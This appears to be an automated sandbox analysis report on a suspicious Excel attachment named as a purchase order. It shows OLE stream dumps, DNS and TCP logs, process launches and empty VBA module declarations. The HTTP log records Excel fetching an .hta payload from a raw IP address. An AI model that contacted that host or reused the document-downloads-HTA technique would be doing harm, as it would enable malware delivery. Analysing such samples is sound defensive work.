                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . u & . . . . # : t . * D J ] 6 [ . . | . . . . . . . . . . . . . . \\ . p . . F . A . F U L L . . . L C . . C 6 | . . D G . @ + . ~ ) u . . . v ] O . - / l ) R 0 0 . - y S f ` . B . . . e a . . . 1 . . . = . . . . J Y . . . . . k . ` . . . . e | . . . . . . . . . . . . . . . W . . . ? . . . K = . . . A z B s . . < @ . . . . H . . . " . . . Y G . . . . 5 w . . . 3 . . . 1 . . . . _ p ; + . & 2 . { 4 + I M . v . 1 . . . . u . 7 . . . I $ } . a . . 2 & 1
                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 c4 a8 d8 a3 75 26 1e d4 aa c5 da 0a 10 f7 9b 23 9e c0 84 9a c1 3a 74 b7 9c ff d2 b1 2a 44 4a 5d 36 ed e6 5b c8 e7 c1 02 0e ac 7c bc a7 e6 83 a9 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 90 c0 e2 00 00 00 5c 00 70 00 04 46 ee c0 1a 41 c6 bd 46 9b 55 b9 4c ce 4c ae f0 05 1f a3 04 4c e8 43 1d ff
                  General
                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                  CLSID:
                  File Type:ASCII text, with CRLF line terminators
                  Stream Size:519
                  Entropy:5.218667437949908
                  Base64 Encoded:True
                  Data ASCII:I D = " { A B 1 6 6 2 D 3 - 8 1 F 4 - 4 C E 6 - 9 1 2 E - 3 7 2 5 6 2 5 2 2 6 4 5 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 0 0 2 9 C 9 A A 0 9 A A 0 9 A A
                  Data Raw:49 44 3d 22 7b 41 42 31 36 36 32 44 33 2d 38 31 46 34 2d 34 43 45 36 2d 39 31 32 45 2d 33 37 32 35 36 32 35 32 32 36 34 35 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                  General
                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                  CLSID:
                  File Type:data
                  Stream Size:104
                  Entropy:3.0488640812019017
                  Base64 Encoded:False
                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                  CLSID:
                  File Type:data
                  Stream Size:2644
                  Entropy:4.000719438931664
                  Base64 Encoded:False
                  Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                  Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                  CLSID:
                  File Type:data
                  Stream Size:553
                  Entropy:6.375463798458224
                  Base64 Encoded:True
                  Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . U . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                  Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 55 1b ea 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 15, 2025 09:01:19.071737051 CET5397580192.168.2.24198.12.89.24
                  Mar 15, 2025 09:01:19.076554060 CET8053975198.12.89.24192.168.2.24
                  Mar 15, 2025 09:01:19.076699018 CET5397580192.168.2.24198.12.89.24
                  Mar 15, 2025 09:01:19.076862097 CET5397580192.168.2.24198.12.89.24
                  Mar 15, 2025 09:01:19.081523895 CET8053975198.12.89.24192.168.2.24
                  Mar 15, 2025 09:01:19.550038099 CET8053975198.12.89.24192.168.2.24
                  Mar 15, 2025 09:01:19.550173044 CET5397580192.168.2.24198.12.89.24
                  Mar 15, 2025 09:01:24.545663118 CET8053975198.12.89.24192.168.2.24
                  Mar 15, 2025 09:01:24.545748949 CET5397580192.168.2.24198.12.89.24
                  Mar 15, 2025 09:01:33.566123962 CET6346253192.168.2.241.1.1.1
                  Mar 15, 2025 09:01:33.570869923 CET53634621.1.1.1192.168.2.24
                  Mar 15, 2025 09:01:33.570971012 CET6346253192.168.2.241.1.1.1
                  Mar 15, 2025 09:01:33.575959921 CET53634621.1.1.1192.168.2.24
                  Mar 15, 2025 09:01:34.016392946 CET6346253192.168.2.241.1.1.1
                  Mar 15, 2025 09:01:34.021759987 CET53634621.1.1.1192.168.2.24
                  Mar 15, 2025 09:01:34.024708033 CET6346253192.168.2.241.1.1.1
                  Mar 15, 2025 09:01:34.629340887 CET63464443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:34.629390001 CET4436346413.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:34.629518986 CET63465443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:34.629535913 CET63464443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:34.629555941 CET4436346513.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:34.629614115 CET63465443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:34.630156040 CET63465443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:34.630172014 CET4436346513.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:34.630234957 CET63464443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:34.630247116 CET4436346413.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.269068956 CET4436346513.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.269140005 CET63465443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:35.274050951 CET63465443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:35.274061918 CET4436346513.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.274312973 CET4436346513.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.284326077 CET63465443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:35.299124002 CET4436346413.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.299201012 CET63464443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:35.301516056 CET63464443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:35.301527977 CET4436346413.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.301770926 CET4436346413.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.302803993 CET63464443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:35.332329035 CET4436346513.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.344331026 CET4436346413.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.380197048 CET4436346513.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.380310059 CET4436346513.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.380748987 CET63465443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:35.381629944 CET63465443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:35.381654978 CET4436346513.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.381665945 CET63465443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:35.381673098 CET4436346513.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.404273987 CET4436346413.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.404297113 CET4436346413.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.404396057 CET63464443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:35.404412031 CET4436346413.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.404429913 CET4436346413.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.404479980 CET63464443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:35.404728889 CET63464443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:35.404743910 CET4436346413.107.246.60192.168.2.24
                  Mar 15, 2025 09:01:35.404753923 CET63464443192.168.2.2413.107.246.60
                  Mar 15, 2025 09:01:35.404758930 CET4436346413.107.246.60192.168.2.24
                  Mar 15, 2025 09:02:18.144994020 CET5397580192.168.2.24198.12.89.24
                  Mar 15, 2025 09:02:18.149687052 CET8053975198.12.89.24192.168.2.24
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 15, 2025 09:01:33.565439939 CET53633201.1.1.1192.168.2.24
                  Mar 15, 2025 09:01:34.563772917 CET6332053192.168.2.241.1.1.1
                  Mar 15, 2025 09:01:34.628206968 CET53633201.1.1.1192.168.2.24
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 15, 2025 09:01:34.563772917 CET192.168.2.241.1.1.10x876cStandard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 15, 2025 09:00:30.070404053 CET1.1.1.1192.168.2.240xf2a1No error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                  Mar 15, 2025 09:00:30.070404053 CET1.1.1.1192.168.2.240xf2a1No error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:00:30.070404053 CET1.1.1.1192.168.2.240xf2a1No error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:00:31.149548054 CET1.1.1.1192.168.2.240xc5b0No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:00:31.149548054 CET1.1.1.1192.168.2.240xc5b0No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:27.658451080 CET1.1.1.1192.168.2.240x8094No error (0)res-stls-prod.edgesuite.net.globalredir.akadns88.neta726.dscd.akamai.netCNAME (Canonical name)IN (0x0001)false
                  Mar 15, 2025 09:01:27.658451080 CET1.1.1.1192.168.2.240x8094No error (0)a726.dscd.akamai.net2.16.164.40A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:27.658451080 CET1.1.1.1192.168.2.240x8094No error (0)a726.dscd.akamai.net2.16.164.131A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:27.658451080 CET1.1.1.1192.168.2.240x8094No error (0)a726.dscd.akamai.net2.16.164.80A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:32.734972000 CET1.1.1.1192.168.2.240x821aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:32.734972000 CET1.1.1.1192.168.2.240x821aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:32.734972000 CET1.1.1.1192.168.2.240x821aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:32.734972000 CET1.1.1.1192.168.2.240x821aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:32.734972000 CET1.1.1.1192.168.2.240x821aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:32.734972000 CET1.1.1.1192.168.2.240x821aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:32.734972000 CET1.1.1.1192.168.2.240x821aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:34.628206968 CET1.1.1.1192.168.2.240x876cNo error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                  Mar 15, 2025 09:01:34.628206968 CET1.1.1.1192.168.2.240x876cNo error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                  Mar 15, 2025 09:01:34.628206968 CET1.1.1.1192.168.2.240x876cNo error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                  Mar 15, 2025 09:01:34.628206968 CET1.1.1.1192.168.2.240x876cNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                  Mar 15, 2025 09:01:34.628206968 CET1.1.1.1192.168.2.240x876cNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:44.218569994 CET1.1.1.1192.168.2.240x37fdNo error (0)res-stls-prod.edgesuite.net.globalredir.akadns88.neta726.dscd.akamai.netCNAME (Canonical name)IN (0x0001)false
                  Mar 15, 2025 09:01:44.218569994 CET1.1.1.1192.168.2.240x37fdNo error (0)a726.dscd.akamai.net2.16.164.131A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:44.218569994 CET1.1.1.1192.168.2.240x37fdNo error (0)a726.dscd.akamai.net2.16.164.40A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:44.218569994 CET1.1.1.1192.168.2.240x37fdNo error (0)a726.dscd.akamai.net2.16.164.80A (IP address)IN (0x0001)false
                  Mar 15, 2025 09:01:44.218569994 CET1.1.1.1192.168.2.240x37fdNo error (0)a726.dscd.akamai.net2.16.164.128A (IP address)IN (0x0001)false
                  • otelrules.svc.static.microsoft
                  • 198.12.89.24
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.2453975198.12.89.24807588C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  TimestampBytes transferredDirectionData
                  Mar 15, 2025 09:01:19.076862097 CET266OUTGET /xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Host: 198.12.89.24
                  Connection: Keep-Alive
                  Mar 15, 2025 09:01:19.550038099 CET539INHTTP/1.1 404 Not Found
                  Date: Sat, 15 Mar 2025 08:01:19 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                  Content-Length: 298
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=iso-8859-1
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 31 32 2e 38 39 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.12.89.24 Port 80</address></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.246346513.107.246.604437588C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  TimestampBytes transferredDirectionData
                  2025-03-15 08:01:35 UTC214OUTGET /rules/rule170146v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
                  Host: otelrules.svc.static.microsoft
                  2025-03-15 08:01:35 UTC491INHTTP/1.1 200 OK
                  Date: Sat, 15 Mar 2025 08:01:35 GMT
                  Content-Type: text/xml
                  Content-Length: 461
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Thu, 14 Nov 2024 16:14:57 GMT
                  ETag: "0x8DD04C77BDE7614"
                  x-ms-request-id: a37c6e3d-601e-0001-546c-95faeb000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20250315T080135Z-186895dd8bdvldfxhC1EWR0frw00000006c0000000001150
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2025-03-15 08:01:35 UTC461INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 37 30 31 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 47 72 61 70 68 69 63 73 2e 45 78 70 6f 72 74 42 75 6c 6c 65 74 42 6c 69 70 43 45 78 63 65 70 74 69 6f 6e 22 20 41 54 54 3d 22 63 66 63 66 64 62 39 31 63 36 38 63 34 33 32 39 62 62 38 62 37 63 62 37 62 61 62 62 33 63 66 37 2d 65 30 38 32 63 32 66 32 2d 65 66 31 64 2d 34 32 37 61 2d 61 63 34 64 2d 62 30 62 37 30 30 61 66 65 37 61 37 2d 37 36 35 35 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 34 38 39 66 34 22 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="170146" V="0" DC="SM" EN="Office.Graphics.ExportBulletBlipCException" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="489f4"


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.246346413.107.246.604437588C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  TimestampBytes transferredDirectionData
                  2025-03-15 08:01:35 UTC215OUTGET /rules/rule120201v19s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
                  Host: otelrules.svc.static.microsoft
                  2025-03-15 08:01:35 UTC515INHTTP/1.1 200 OK
                  Date: Sat, 15 Mar 2025 08:01:35 GMT
                  Content-Type: text/xml
                  Content-Length: 2781
                  Connection: close
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 31 Dec 2024 22:07:50 GMT
                  ETag: "0x8DD29E791389B5C"
                  x-ms-request-id: 1cfd798f-001e-008d-457d-95d91e000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20250315T080135Z-186895dd8bdsf9rwhC1EWR00un00000005t0000000002nm0
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2025-03-15 08:01:35 UTC2781INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 32 30 31 22 20 56 3d 22 31 39 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 73 61 67 65 2e 43 6c 69 63 6b 53 74 72 65 61 6d 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 55 73 61 67 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120201" V="19" DC="SM" EN="Office.System.SystemHealthUsage.ClickStream" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalUsage" DCa="PSU" xmlns=""> <RIS>


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:04:00:25
                  Start date:15/03/2025
                  Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                  Imagebase:0x7ff796e40000
                  File size:70'082'712 bytes
                  MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:false

                  Target ID:12
                  Start time:04:01:29
                  Start date:15/03/2025
                  Path:C:\Windows\splwow64.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\splwow64.exe 12288
                  Imagebase:0x7ff694ec0000
                  File size:192'512 bytes
                  MD5 hash:AF4A7EBF6114EE9E6FBCC910EC3C96E6
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:false

                  Target ID:15
                  Start time:04:01:42
                  Start date:15/03/2025
                  Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO-ARJ-2025-15ACA.xla.xlsx"
                  Imagebase:0x7ff796e40000
                  File size:70'082'712 bytes
                  MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Call Graph

                  • Entrypoint
                  • Decryption Function
                  • Executed
                  • Not Executed
                  • Show Help
                  callgraph 1 Error: Graph is empty

                  Module: Sheet1

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "Sheet1"

                  2

                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = True

                  Module: Sheet2

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "Sheet2"

                  2

                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = True

                  Module: Sheet3

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "Sheet3"

                  2

                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = True

                  Module: ThisWorkbook

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "ThisWorkbook"

                  2

                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = True

                  Reset < >